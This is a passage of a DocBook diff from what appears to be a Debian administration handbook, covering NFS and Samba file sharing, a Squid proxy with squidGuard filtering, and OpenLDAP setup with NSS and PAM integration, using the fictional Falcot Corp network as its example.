+      <literal>nogroup</literal>).</para>
+
+      <para>With NFSv4, you can add a <literal>sec</literal> option to
+        indicate the security level that you want:
+        <literal>sec=sys</literal> is the default with no special security
+        features, <literal>sec=krb5</literal> enables authentication only,
+        <literal>sec=krb5i</literal> adds integrity protection, and
+        <literal>sec=krb5p</literal> is the most complete level which
+        includes privacy protection (with data encryption). For this
+        to work you need a working Kerberos setup (that service is not
+        covered by this book).
+      </para>
+
+      <para>Other options are available; they are documented in the
+      <citerefentry><refentrytitle>exports</refentrytitle>
+      <manvolnum>5</manvolnum></citerefentry> manual page.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> First installation</title>
+
+	<para>The <filename>/etc/init.d/nfs-kernel-server</filename> boot
+	script only starts the server if the
+	<filename>/etc/exports</filename> lists one or more valid NFS
+	shares. On initial configuration, once this file has been edited to
+	contain valid entries, the NFS server must therefore be started
+	with the following command:</para>
+
+        <screen>
+<computeroutput># </computeroutput><userinput>service nfs-kernel-server start</userinput>
+</screen>
+      </sidebar>
+    </section>
+    <section>
+      <title>NFS Client</title>
+      <indexterm><primary>client</primary><secondary>NFS</secondary></indexterm>
+      <indexterm><primary>NFS</primary><secondary>client</secondary></indexterm>
+
+      <para>As with other filesystems, integrating an NFS share into the
+      system hierarchy requires mounting. Since this filesystem has its
+      peculiarities, a few adjustments were required in the syntaxes of the
+      <command>mount</command> command and the
+      <filename>/etc/fstab</filename> file.</para>
+
+      <example>
+        <title>Manually mounting with the <command>mount</command> command</title>
+
+        <screen>
+          <computeroutput># </computeroutput><userinput>mount -t nfs4 -o rw,nosuid arrakis.internal.falcot.com:/shared /srv/shared</userinput></screen>
+      </example>
+
+      <example>
+        <title>NFS entry in the <filename>/etc/fstab</filename> file</title>
+
+        <programlisting>
+arrakis.internal.falcot.com:/shared /srv/shared nfs4 rw,nosuid 0 0
+</programlisting>
+      </example>
+
+      <para>The entry described above mounts, at system startup, the
+      <filename>/shared/</filename> NFS directory from the
+      <literal>arrakis</literal> server into the local
+      <filename>/srv/shared/</filename> directory. Read-write access is
+      requested (hence the <literal>rw</literal> parameter). The
+      <literal>nosuid</literal> option is a protection measure that wipes
+      any <literal>setuid</literal> or <literal>setgid</literal> bit from
+      programs stored on the share. If the NFS share is only meant to store
+      documents, another recommended option is <literal>noexec</literal>,
+      which prevents executing programs stored on the share. Note that
+      on the server, the <filename>shared</filename> directory is below
+      the NFSv4 root export (for example
+      <filename>/export/shared</filename>), it is not a top-level
+      directory.</para>
+
+      <para>The <citerefentry><refentrytitle>nfs</refentrytitle>
+      <manvolnum>5</manvolnum></citerefentry> manual page describes all the
+      options in some detail.</para>
+    </section>
+  </section>
+  <section id="sect.windows-file-server-with-samba">
+    <title>Setting Up Windows Shares with Samba</title>
+
+    <para>Samba is a suite of tools handling the SMB protocol (also known as
+    “CIFS”) on Linux. This protocol is used by Windows for network
+    shares and shared printers.</para>
+    <indexterm><primary>Windows share</primary></indexterm>
+    <indexterm><primary>Samba</primary></indexterm>
+    <indexterm><primary>SMB</primary></indexterm>
+    <indexterm><primary>CIFS</primary></indexterm>
+    <indexterm><primary>server</primary><secondary>file</secondary></indexterm>
+
+    <para>Samba can also act as an Windows domain controller. This is an
+    outstanding tool for ensuring seamless integration of Linux servers and
+    the office desktop machines still running Windows.</para>
+    <section>
+      <title>Samba Server</title>
+
+      <para>The <emphasis role="pkg">samba</emphasis> package contains the
+      main two servers of Samba 4, <command>smbd</command> and
+      <command>nmbd</command>.</para>
+      <indexterm><primary><command>smbd</command></primary></indexterm>
+      <indexterm><primary><command>nmbd</command></primary></indexterm>
+
+      
+
+      <sidebar>
+        <title><emphasis>DOCUMENTATION</emphasis> Going further</title>
+
+	<para>The Samba server is extremely configurable and versatile, and
+	can address a great many different use cases matching very
+	different requirements and network architectures. This book only
+        focuses on the use case where Samba is used as a standalone server,
+        but it can also be a NT4 Domain Controller or a full Active
+        Directory Domain Controller, or a simple member of an existing
+        domain (which could be a managed by a Windows server).</para>
+        <indexterm><primary>domain controller</primary></indexterm>
+        <indexterm><primary>Windows domain</primary></indexterm>
+
+	<para>The <emphasis role="pkg">samba-doc</emphasis> package
+	contains a wealth of commented example files in
+	<filename>/usr/share/doc/samba-doc/examples/</filename>.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> Authenticating with a Windows Server</title>
+
+	<para>Winbind gives system administrators the option of using a
+	Windows server as an authentication server. Winbind also
+	integrates cleanly with PAM and NSS. This allows setting up Linux
+	machines where all users of a Windows domain automatically get an
+	account.</para>
+        <indexterm><primary>Winbind</primary></indexterm>
+
+	<para>More information can be found in the
+	<filename>/usr/share/doc/samba-doc/examples/pam_winbind/</filename>
+	directory.</para>
+      </sidebar>
+      <section>
+        <title>Configuring with <command>debconf</command></title>
+
+	<para>The package sets up a minimal configuration during the initial
+        installation but you should really run <command>dpkg-reconfigure
+        samba-common</command> to adapt it:</para>
+
+	<para>The first piece of required information is the name of the
+	workgroup where the Samba server will belong (the answer is
+	<literal>FALCOTNET</literal> in our case).</para>
+
+	<para>The package also proposes identifying the WINS server from
+	the information provided by the DHCP daemon. The Falcot Corp
+	administrators rejected this option, since they intend to use the
+	Samba server itself as the WINS server.</para>
+        <indexterm><primary>WINS</primary></indexterm>
+      </section>
+      <section>
+        <title>Configuring Manually</title>
+        <section>
+          <title>Changes to <filename>smb.conf</filename></title>
+
+	  <para>The requirements at Falcot require other options to be
+	  modified in the <filename>/etc/samba/smb.conf</filename>
+	  configuration file. The following excerpts summarize the changes
+	  that were effected in the <literal>[global]</literal>
+	  section.</para>
+
+          <programlisting>
+[global]
+
+## Browsing/Identification ###
+
+# Change this to the workgroup/NT-domain name your Samba server will part of
+   workgroup = FALCOTNET
+
+# Windows Internet Name Serving Support Section:
+# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
+   wins support = yes <co id="smb.conf.wins"></co>
+
+[...]
+
+####### Authentication #######
+
+# Server role. Defines in which mode Samba will operate. Possible
+# values are "standalone server", "member server", "classic primary
+# domain controller", "classic backup domain controller", "active
+# directory domain controller". 
+#
+# Most people will want "standalone sever" or "member server".
+# Running as "active directory domain controller" will require first
+# running "samba-tool domain provision" to wipe databases and create a
+# new domain.
+   server role = standalone server
+
+# "security = user" is always a good idea. This will require a Unix account
+# in this server for every user accessing the server.
+   security = user <co id="smb.conf.security"></co>
+
+[...]
+</programlisting>
+          <calloutlist>
+            <callout arearefs="smb.conf.wins">
+	      <para>Indicates that Samba should act as a Netbios name
+	      server (WINS) for the local network.</para>
+            </callout>
+            <callout arearefs="smb.conf.security">
+	      <para>This is the default value for this parameter; however,
+	      since it is central to the Samba configuration, filling it
+	      explicitly is recommended. Each user must authenticate before
+	      accessing any share.</para>
+            </callout>
+          </calloutlist>
+        </section>
+        <section>
+          <title>Adding Users</title>
+
+	  <para>Each Samba user needs an account on the server; the Unix
+	  accounts must be created first, then the user needs to be
+	  registered in Samba's database. The Unix step is done quite
+	  normally (using <command>adduser</command> for instance).</para>
+
+	  <para>Adding an existing user to the Samba database is a matter
+	  of running the <command>smbpasswd -a
+	  <replaceable>user</replaceable></command> command; this command
+	  asks for the password interactively.</para>
+
+	  <para>A user can be deleted with the <command>smbpasswd -x
+	  <replaceable>user</replaceable></command> command. A Samba
+	  account can also be temporarily disabled (with <command>smbpasswd
+	  -d <replaceable>user</replaceable></command>) and re-enabled
+	  later (with <command>smbpasswd -e
+	  <replaceable>user</replaceable></command>).</para>
+        </section>
+      </section>
+    </section>
+    <section>
+      <title>Samba Client</title>
+
+      <para>The client features in Samba allow a Linux machine to access
+      Windows shares and shared printers. The required programs are
+      available in the <emphasis role="pkg">cifs-utils</emphasis> and <emphasis role="pkg">smbclient</emphasis> packages.</para>
+      <indexterm><primary><emphasis>smbclient</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis>cifs-utils</emphasis></primary></indexterm>
+      <section>
+        <title>The <command>smbclient</command> Program</title>
+
+	<para>The <command>smbclient</command> program queries SMB servers.
+	It accepts a <literal>-U <replaceable>user</replaceable></literal>
+	option, for connecting to the server under a specific identity.
+	<command>smbclient
+	//<replaceable>server</replaceable>/<replaceable>share</replaceable></command>
+	accesses the share in an interactive way similar to the
+	command-line FTP client. <command>smbclient -L
+	<replaceable>server</replaceable></command> lists all available
+	(and visible) shares on a server.</para>
+      </section>
+      <section>
+        <title>Mounting Windows Shares</title>
+
+	<para>The <command>mount</command> command allows mounting a
+	Windows share into the Linux filesystem hierarchy (with the
+	help of <command>mount.cifs</command> provided by
+	<emphasis role="pkg">cifs-utils</emphasis>).</para>
+        <indexterm><primary><command>mount.cifs</command></primary></indexterm>
+	<indexterm><primary>Windows share, mounting</primary></indexterm>
+
+        <example>
+          <title>Mounting a Windows share</title>
+
+          <programlisting>
+mount -t cifs //arrakis/shared /shared \
+      -o credentials=/etc/smb-credentials
+</programlisting>
+        </example>
+
+	<para>The <filename>/etc/smb-credentials</filename> file
+	(which must not be readable by users) has the following
+	format:</para>
+
+        <programlisting>
+username = <replaceable>user</replaceable>
+password = <replaceable>password</replaceable></programlisting>
+
+	<para>Other options can be specified on the command-line; their
+	full list is available in the
+	<citerefentry><refentrytitle>mount.cifs</refentrytitle>
+	<manvolnum>1</manvolnum></citerefentry> manual page. Two options in
+	particular can be interesting: <literal>uid</literal> and
+	<literal>gid</literal> allow forcing the owner and group of files
+	available on the mount, so as not to restrict access to
+	root.</para>
+
+	<para>A mount of a Windows share can also be configured
+	in <filename>/etc/fstab</filename>:</para>
+
+        <programlisting>
+//<replaceable>server</replaceable>/shared /shared cifs credentials=/etc/smb-credentials
+</programlisting>
+
+	<para>Unmounting a SMB/CIFS share is done with the standard
+	<command>umount</command> command.</para>
+      </section>
+      <section>
+        <title>Printing on a Shared Printer</title>
+
+	<para>CUPS is an elegant solution for printing from a Linux
+	workstation to a printer shared by a Windows machine. When the
+	<emphasis role="pkg">smbclient</emphasis> is installed, CUPS allows
+	installing Windows shared printers automatically.</para>
+        <indexterm><primary>printing</primary><secondary>network</secondary></indexterm>
+
+	<para>Here are the required steps:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>Enter the CUPS configuration interface:
+	    <literal>http://localhost:631/admin</literal></para>
+          </listitem>
+          <listitem>
+	    <para>Click on “Add Printer”.</para>
+          </listitem>
+          <listitem>
+	    <para>Choose the printer device, pick “Windows Printer
+	    via SAMBA”.</para>
+          </listitem>
+          <listitem>
+	    <para>Enter the connection URI for the network printer. It should look like the
+	    following:</para>
+	   
+	    <para><literal>smb://<replaceable>user</replaceable>:<replaceable>password</replaceable>@<replaceable>server</replaceable>/<replaceable>printer</replaceable></literal>.</para>
+          </listitem>
+	  <listitem>
+	    <para>Enter the name that will uniquely identify this printer.
+	    Then enter the description and location of the printer. Those are the
+	    strings that will be shown to end users to help them identify the
+	    printers.</para>
+	  </listitem>
+	  <listitem>
+	    <para>Indicate the manufacturer/model of the printer, or directly provide
+	    a working printer description file (PPD).</para>
+	  </listitem>
+        </itemizedlist>
+
+	<para>Voilà, the printer is operational!</para>
+      </section>
+    </section>
+  </section>
+  <section id="sect.http-ftp-proxy">
+    <title>HTTP/FTP Proxy</title>
+
+    <para>An HTTP/FTP proxy acts as an intermediary for HTTP and/or FTP
+    connections. Its role is twofold:</para>
+    <itemizedlist>
+      <listitem>
+	<para>Caching: recently downloaded documents are copied locally,
+	which avoids multiple downloads.</para>
+      </listitem>
+      <listitem>
+	<para>Filtering server: if use of the proxy is mandated (and
+	outgoing connections are blocked unless they go through the proxy),
+	then the proxy can determine whether or not the request is to be
+	granted.</para>
+      </listitem>
+    </itemizedlist>
+    <indexterm><primary>HTTP/FTP proxy</primary></indexterm>
+    <indexterm><primary>proxy cache</primary></indexterm>
+
+    <para>Falcot Corp selected Squid as their proxy server.</para>
+    <indexterm><primary>Squid</primary></indexterm>
+    <section>
+      <title>Installing</title>
+
+      <para>The <emphasis role="pkg">squid3</emphasis> Debian package only
+      contains the modular (caching) proxy. Turning it into a filtering
+      server requires installing the additional <emphasis role="pkg">squidguard</emphasis> package. In addition, <emphasis role="pkg">squid-cgi</emphasis> provides a querying and
+      administration interface for a Squid proxy.</para>
+
+      <para>Prior to installing, care should be taken to check that the
+      system can identify its own complete name: the <command>hostname
+      -f</command> must return a fully-qualified name (including a domain).
+      If it does not, then the <filename>/etc/hosts</filename> file should
+      be edited to contain the full name of the system (for instance,
+      <literal>arrakis.falcot.com</literal>). The official computer name
+      should be validated with the network administrator in order to avoid
+      potential name conflicts.</para>
+    </section>
+    <section>
+      <title>Configuring a Cache</title>
+
+      <para>Enabling the caching server feature is a simple matter of
+      editing the <filename>/etc/squid3/squid.conf</filename> configuration
+      file and allowing machines from the local network to run queries
+      through the proxy. The following example shows the modifications made
+      by the Falcot Corp administrators:</para>
+
+      <example>
+        <title>The <filename>/etc/squid3/squid.conf</filename> file (excerpts)</title>
+
+        <programlisting>
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+
+# Example rule allowing access from your local networks. Adapt
+# to list your (internal) IP networks from where browsing should
+# be allowed
+acl our_networks src 192.168.1.0/24 192.168.2.0/24
+http_access allow our_networks
+http_access allow localhost
+# And finally deny all other access to this proxy
+http_access deny all
+</programlisting>
+      </example>
+    </section>
+    <section>
+      <title>Configuring a Filter</title>
+
+      <para><command>squid</command> itself does not perform the filtering;
+      this action is delegated to <command>squidGuard</command>. The former
+      must then be configured to interact with the latter. This involves
+      adding the following directive to the
+      <filename>/etc/squid3/squid.conf</filename> file:</para>
+      <indexterm><primary><command>squidGuard</command></primary></indexterm>
+
+      <programlisting>
+url_rewrite_program /usr/bin/squidGuard -c /etc/squid3/squidGuard.conf 
+</programlisting>
+
+      <para>The <filename>/usr/lib/cgi-bin/squidGuard.cgi</filename> CGI
+      program also needs to be installed, using
+      <filename>/usr/share/doc/squidguard/examples/squidGuard.cgi.gz</filename>
+      as a starting point. Required modifications to this script are the
+      <varname>$proxy</varname> and <varname>$proxymaster</varname>
+      variables (the name of the proxy and the administrator's contact
+      e-mail, respectively). The <varname>$image</varname> and
+      <varname>$redirect</varname> variables should point to existing
+      images representing the rejection of a query.</para>
+
+      <para>The filter is enabled with the <command>service squid3
+      reload</command> command. However, since the <emphasis role="pkg">squidguard</emphasis> package does no filtering by
+      default, it is the administrator's task to define the policy. This
+      can be done by creating the
+      <filename>/etc/squid3/squidGuard.conf</filename> file (using
+      <filename>/etc/squidguard/squidGuard.conf.default</filename> as
+      template if required).</para>
+
+      <para>The working database must be regenerated with
+      <command>update-squidguard</command> after each change of the
+      <command>squidGuard</command> configuration file (or one of the lists
+      of domains or URLs it mentions). The configuration file syntax is
+      documented on the following website: <ulink type="block" url="http://www.squidguard.org/Doc/configure.html" /></para>
+      <indexterm><primary><command>update-squidguard</command></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>ALTERNATIVE</emphasis> DansGuardian</title>
+        <indexterm><primary><emphasis role="pkg">dansguardian</emphasis></primary></indexterm>
+        <indexterm><primary>PICS</primary></indexterm>
+
+	<para>The <emphasis role="pkg">dansguardian</emphasis> package is
+	an alternative to <emphasis>squidguard</emphasis>. This software
+	does not simply handle a blacklist of forbidden URLs, but it can
+	take advantage of the PICS system (<emphasis>Platform for Internet
+	Content Selection</emphasis>) to decide whether a page is
+	acceptable by dynamic analysis of its contents.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.ldap-directory">
+    <title>LDAP Directory</title>
+    <indexterm><primary>LDAP</primary></indexterm>
+    <indexterm><primary>OpenLDAP</primary></indexterm>
+    <indexterm><primary>directory, LDAP</primary></indexterm>
+
+    <para>OpenLDAP is an implementation of the LDAP protocol; in other
+    words, it is a special-purpose database designed for storing
+    directories. In the most common use case, using an LDAP server allows
+    centralizing management of user accounts and the related permissions.
+    Moreover, an LDAP database is easily replicated, which allows setting
+    up multiple synchronized LDAP servers. When the network and the user
+    base grows quickly, the load can then be balanced across several
+    servers.</para>
+
+    <para>LDAP data is structured and hierarchical. The structure is
+    defined by “schemas” which describe the kind of objects that the
+    database can store, with a list of all their possible attributes. The
+    syntax used to refer to a particular object in the database is based on
+    this structure, which explains its complexity.</para>
+    <section>
+      <title>Installing</title>
+
+      <para>The <emphasis role="pkg">slapd</emphasis> package contains the
+      OpenLDAP server. The <emphasis role="pkg">ldap-utils</emphasis>
+      package includes command-line tools for interacting with LDAP
+      servers.</para>
+      <indexterm><primary><emphasis>slapd</emphasis></primary></indexterm>
+
+      <para>
+        Installing <emphasis role="pkg">slapd</emphasis> usually
+        asks very few questions and the resulting database is unlikely
+        to suit your needs. Fortunately a simple <command>dpkg-reconfigure
+        slapd</command> will let you reconfigure the LDAP database with
+        more details:
+      </para>
+      <itemizedlist>
+        <listitem>
+	  <para>Omit OpenLDAP server configuration? No, of course, we want
+	  to configure this service.</para>
+        </listitem>
+        <listitem>
+	  <para>DNS domain name:
+	  “<literal>falcot.com</literal>”.</para>
+        </listitem>
+        <listitem>
+	  <para>Organization name: “Falcot Corp”.</para>
+        </listitem>
+        <listitem>
+	  <para>An administrative passwords needs to be typed in.</para>
+        </listitem>
+        <listitem>
+	  <para>Database backend to use: “MDB”.</para>
+        </listitem>
+        <listitem>
+	  <para>Do you want the database to be removed when <emphasis role="pkg">slapd</emphasis> is purged? No. No point in risking
+	  losing the database in case of a mistake.</para>
+        </listitem>
+        <listitem>
+	  <para>Move old database? This question is only asked when the
+	  configuration is attempted while a database already exists. Only
+	  answer “yes” if you actually want to start again from a clean
+	  database, for instance if you run <command>dpkg-reconfigure
+	  slapd</command> right after the initial installation.</para>
+        </listitem>
+        <listitem>
+	  <para>Allow LDAPv2 protocol? No, there is no point in that. All
+	  the tools we are going to use understand the LDAPv3
+	  protocol.</para>
+        </listitem>
+      </itemizedlist>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> LDIF format</title>
+
+	<para>An LDIF file (<emphasis>LDAP Data Interchange
+	Format</emphasis>) is a portable text file describing the contents
+	of an LDAP database (or a portion thereof); this can then be used
+	to inject the data into any other LDAP server.</para>
+        <indexterm><primary>LDIF</primary></indexterm>
+      </sidebar>
+
+      <para>A minimal database is now configured, as demonstrated by the
+      following query:</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>ldapsearch -x -b dc=falcot,dc=com</userinput>
+<computeroutput># extended LDIF
+#
+# LDAPv3
+# base &lt;dc=falcot,dc=com&gt; with scope sub
+# filter: (objectclass=*)
+# requesting: ALL
+#
+
+# falcot.com
+dn: dc=falcot,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Falcot Corp
+dc: falcot
+
+# admin, falcot.com
+dn: cn=admin,dc=falcot,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: LDAP administrator
+
+# search result
+search: 2
+result: 0 Success
+
+# numResponses: 3
+# numEntries: 2
+</computeroutput>
+</screen>
+
+      <para>The query returned two objects: the organization itself, and
+      the administrative user.</para>
+    </section>
+    <section>
+      <title>Filling in the Directory</title>
+
+      <para>Since an empty database is not particularly useful, we are going
+      to inject into it all the existing directories; this includes the
+      users, groups, services and hosts databases.</para>
+
+      <para>The <emphasis role="pkg">migrationtools</emphasis> package
+      provides a set of scripts dedicated to extract data from the standard
+      Unix directories (<filename>/etc/passwd</filename>,
+      <filename>/etc/group</filename>, <filename>/etc/services</filename>,
+      <filename>/etc/hosts</filename> and so on), convert this data, and
+      inject it into the LDAP database.</para>
+      <indexterm><primary><emphasis role="pkg">migrationtools</emphasis></primary></indexterm>
+
+      <para>Once the package is installed, the
+      <filename>/etc/migrationtools/migrate_common.ph</filename> must be
+      edited; the <varname>IGNORE_UID_BELOW</varname> and
+      <varname>IGNORE_GID_BELOW</varname> options need to be enabled
+      (uncommenting them is enough), and
+      <varname>DEFAULT_MAIL_DOMAIN</varname>/<varname>DEFAULT_BASE</varname>
+      need to be updated.
+      </para>
+
+      <para>The actual migration operation is handled by the
+      <command>migrate_all_online.sh</command> command, as follows:</para>
+
+      <screen>
+<computeroutput># </computeroutput><userinput>cd /usr/share/migrationtools</userinput>
+<computeroutput># </computeroutput><userinput>LDAPADD="/usr/bin/ldapadd -c" ETC_ALIASES=/dev/null ./migrate_all_online.sh</userinput>
+</screen>
+
+      <para>The <command>migrate_all_online.sh</command> asks a few
+      questions about the LDAP database into which the data is to be
+      migrated. <xref linkend="tab-migrate-all" xrefstyle="select: label       nopage" /> summarizes the answers given in the Falcot use-case.</para>
+ 
+      <table colsep="1" id="tab-migrate-all">
+        <title>Answers to questions asked by the <command>migrate_all_online.sh</command> script</title>
+	<tgroup cols="2"><colspec align="justify"></colspec><colspec align="justify"></colspec>
+	<thead>
+	  <row><entry>Question</entry><entry>Answer</entry></row>
+	</thead>
+	<tbody>
+	  <row>
+	    <entry>X.500 naming context</entry>
+	    <entry><literal>dc=falcot,dc=com</literal></entry>
+	  </row>
+	  <row>
+	    <entry>LDAP server hostname</entry>
+	    <entry><literal>localhost</literal></entry>
+	  </row>
+	  <row>
+	    <entry>Manager DN</entry>
+	    <entry><literal>cn=admin,dc=falcot,dc=com</literal></entry>
+	  </row>
+	  <row>
+	    <entry>Bind credentials</entry>
+	    <entry>the administrative password</entry>
+	  </row>
+	  <row>
+	    <entry>Create DUAConfigProfile</entry>
+	    <entry>no</entry>
+	  </row>
+	</tbody>
+	</tgroup>
+      </table>
+
+      <para>We deliberately ignore migration of the
+      <filename>/etc/aliases</filename> file, since the standard schema as
+      provided by Debian does not include the structures that this script
+      uses to describe email aliases. Should we want to integrate this data
+      into the directory, the
+      <filename>/etc/ldap/schema/misc.schema</filename> file should be
+      added to the standard schema.</para>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> Browsing an LDAP directory</title>
+
+	<para>The <command>jxplorer</command> command (in the package of the
+	same name) is a graphical tool allowing to browse and edit an LDAP
+	database. It is an interesting tool that provides an administrator
+	with a good overview of the hierarchical structure of the LDAP
+	data.</para>
+        <indexterm><primary><command>jxplorer</command></primary></indexterm>
+      </sidebar>
+
+      <para>Also note the use of the <literal>-c</literal> option to the
+      <command>ldapadd</command> command; this option requests that
+      processing doesn't stop in case of error. Using this option is
+      required because converting the <filename>/etc/services</filename>
+      often generates a few errors that can safely be ignored.</para>
+    </section>
+    <section>
+      <title>Managing Accounts with LDAP</title>
+
+      <para>Now the LDAP database contains some useful information, the
+      time has come to make use of this data. This section focuses on how
+      to configure a Linux system so that the various system directories
+      use the LDAP database.</para>
+      <section id="sect.config-nss">
+        <title>Configuring NSS</title>
+
+	<para>The NSS system (Name Service Switch, see sidebar <xref linkend="sidebar.intro-nss" />) is a modular system designed to define
+	or fetch information for system directories. Using LDAP as a source
+	of data for NSS requires installing the <emphasis role="pkg">libnss-ldap</emphasis> package. Its installation asks a
+	few questions; the answers are summarized in <xref linkend="tab-libnss-ldap" xrefstyle="select: label  nopage" />.</para>
+        <indexterm><primary><emphasis>libnss-ldap</emphasis></primary></indexterm>
+
+        <table colsep="1" id="tab-libnss-ldap">
+          <title>Configuring the <emphasis role="pkg">libnss-ldap</emphasis> package</title>
+          <tgroup cols="2">
+            <colspec align="justify"></colspec>
+            <colspec align="justify"></colspec>
+            <thead>
+              <row>
+                <entry>Question</entry>
+                <entry>Answer</entry>
+              </row>
+            </thead>
+            <tbody>
+              <row>
+                <entry>LDAP server Uniform Resource Identifier</entry>
+                <entry>
+                  <literal>ldap://ldap.falcot.com</literal>
+                </entry>
+              </row>
+              <row>
+                <entry>Distinguished name of the search base</entry>
+                <entry>
+                  <literal>dc=falcot,dc=com</literal>
+                </entry>
+              </row>
+              <row>
+                <entry>LDAP version to use</entry>
+                <entry>
+                  <literal>3</literal>
+                </entry>
+              </row>
+              <row>
+                <entry>Does the LDAP database require login?</entry>
+                <entry>no</entry>
+              </row>
+	      <row>
+	        <entry>Special LDAP privileges for root</entry>
+		<entry>yes</entry>
+	      </row>
+	      <row>
+	        <entry>Make the configuration file readable/writeable by its owner only</entry>
+		<entry>no</entry>
+	      </row>
+              <row>
+                <entry>LDAP account for root</entry>
+                <entry>
+                  <literal>cn=admin,dc=falcot,dc=com</literal>
+                </entry>
+              </row>
+              <row>
+                <entry>LDAP root account password</entry>
+                <entry>the administrative password</entry>
+              </row>
+            </tbody>
+          </tgroup>
+        </table>
+
+	<para>The <filename>/etc/nsswitch.conf</filename> file then needs
+	to be modified, so as to configure NSS to use the freshly-installed
+	<command>ldap</command> module.</para>
+
+        <example>
+          <title>The <filename>/etc/nsswitch.conf</filename> file</title>
+
+          <programlisting>
+# /etc/nsswitch.conf
+#
+# Example configuration of GNU Name Service Switch functionality.
+# If you have the `glibc-doc' and `info' packages installed, try:
+# `info libc "Name Service Switch"' for information about this file.
+
+passwd: ldap compat
+group: ldap compat
+shadow: ldap compat
+
+hosts: files dns ldap
+networks: ldap files
+
+protocols: ldap db files
+services: ldap db files
+ethers: ldap db files
+rpc: ldap db files
+
+netgroup: ldap files
+</programlisting>
+        </example>
+
+	<para>The <command>ldap</command> module is usually inserted before
+	others, and it will therefore be queried first. The notable
+	exception is the <literal>hosts</literal> service since contacting
+	the LDAP server requires consulting DNS first (to resolve
+	<literal>ldap.falcot.com</literal>). Without this exception, a
+	hostname query would try to ask the LDAP server; this would trigger
+	a name resolution for the LDAP server, and so on in an infinite
+	loop.</para>
+
+	<para>If the LDAP server should be considered authoritative (and
+	the local files used by the <command>files</command> module
+	disregarded), services can be configured with the following
+	syntax:</para>
+
+	<para><literal><replaceable>service</replaceable>: ldap
+	[NOTFOUND=return] files</literal>.</para>
+
+	<para>If the requested entry does not exist in the LDAP database,
+	the query will return a “not existing” reply even if the
+	resource does exist in one of the local files; these local files
+	will only be used when the LDAP service is down.</para>
+      </section>
+      <section id="sect.config-pam">
+        <title>Configuring PAM</title>
+
+	<para>This section describes a PAM configuration (see sidebar <xref linkend="sidebar.intro-pam" />) that will allow applications to
+	perform the required authentications against the LDAP
+	database.</para>
+
+        <sidebar>
+          <title><emphasis>CAUTION</emphasis> Broken authentication</title>
+
+	  <para>Changing the standard PAM configuration used by various
+	  programs is a sensitive operation. A mistake can lead to broken
+	  authentication, which could prevent logging in. Keeping a root
+	  shell open is therefore a good precaution. If configuration
+	  errors occur, they can be then fixed and the services restarted
+	  with minimal effort.</para>
+        </sidebar>
+
+	<para>The LDAP module for PAM is provided by the <emphasis role="pkg">libpam-ldap</emphasis> package. Installing this package
+	asks a few questions very similar to those in <emphasis role="pkg">libnss-ldap</emphasis>; some configuration parameters
+	(such as the URI for the LDAP server) are even actually shared with
+	the <emphasis role="pkg">libnss-ldap</emphasis> package. Answers
+	are summarized in <xref linkend="tab-libpam-ldap" xrefstyle="select: label nopage" />.</para>
+        <indexterm><primary><emphasis>libpam-ldap</emphasis></primary></indexterm>
+
+        <table colsep="1" id="tab-libpam-ldap">
+          <title>Configuration of <emphasis>libpam-ldap</emphasis></title>
+          <tgroup cols="2">
+            <colspec align="justify"></colspec>
+            <colspec align="justify"></colspec>
+            <thead>
+              <row>
+                <entry>Question</entry>
+                <entry>Answer</entry>
+              </row>
+            </thead>
+            <tbody>
+              <row>
+                <entry>Allow LDAP admin account to behave like local root?</entry>
+                <entry>Yes. This allows using the usual <command>passwd</command> command for changing passwords stored in the LDAP database.</entry>
+              </row>
+              <row>
+                <entry>Does the LDAP database require logging in?</entry>
+                <entry>no</entry>
+              </row>
+              <row>
+                <entry>LDAP account for root</entry>
+                <entry>
+                  <literal>cn=admin,dc=falcot,dc=com</literal>
+                </entry>
+              </row>
+              <row>
+                <entry>LDAP root account password</entry>
+                <entry>the LDAP database administrative password</entry>
+              </row>
+	      <row>
+	        <entry>Local encryption algorithm to use for passwords</entry>
+		<entry>crypt</entry>
+	      </row>
+            </tbody>
+          </tgroup>
+        </table>
+
+	<para>Installing <emphasis role="pkg">libpam-ldap</emphasis>
+	automatically adapts the default PAM configuration defined in the
+	<filename>/etc/pam.d/common-auth</filename>,
+	<filename>/etc/pam.d/common-password</filename> and
+	<filename>/etc/pam.d/common-account</filename> files. This
+	mechanism uses the dedicated <command>pam-auth-update</command>
+	tool (provided by the <emphasis role="pkg">libpam-runtime</emphasis> package). This tool can also
+	be run by the administrator should they wish to enable or disable
+	PAM modules.</para>
+        <indexterm><primary><filename>common-auth</filename></primary></indexterm>
+        <indexterm><primary><filename>/etc/pam.d/common-auth</filename></primary></indexterm>
+        <indexterm><primary><filename>common-password</filename></primary></indexterm>
+        <indexterm><primary><filename>/etc/pam.d/common-password</filename></primary></indexterm>
+        <indexterm><primary><filename>common-account</filename></primary></indexterm>
+        <indexterm><primary><filename>/etc/pam.d/common-account</filename></primary></indexterm>
+      </section>
+      <section>
+        <title>Securing LDAP Data Exchanges</title>
+        <indexterm><primary>LDAP</primary><secondary>secure</secondary></indexterm>
+
+	<para>By default, the LDAP protocol transits on the network as
+	cleartext; this includes the (encrypted) passwords. Since the
+	encrypted passwords can be extracted from the network, they can be
+	vulnerable to dictionary-type attacks. This can be avoided by using
+	an extra encryption layer; enabling this layer is the topic of this
+	section.</para>
+        <section>
+          <title>Configuring the Server</title>
+          <indexterm><primary><foreignphrase>OpenSSL</foreignphrase></primary><secondary>creating keys</secondary></indexterm>
+          <indexterm><primary>key pair</primary></indexterm>
+
+	  <para>The first step is to create a key pair (comprising a public
+	  key and a private key) for the LDAP server. The Falcot administrators
+	  reuse <emphasis>easy-rsa</emphasis> to generate it (see
+	  <xref linkend="sect.easy-rsa" />).
+	  Running <command>./build-key-server ldap.falcot.com</command> asks
+	  a few mundane questions (location, organization name and so on).
+	  The answer to the “common name” question
+	  <emphasis>must</emphasis> be the fully-qualified hostname for the
+	  LDAP server; in our case,
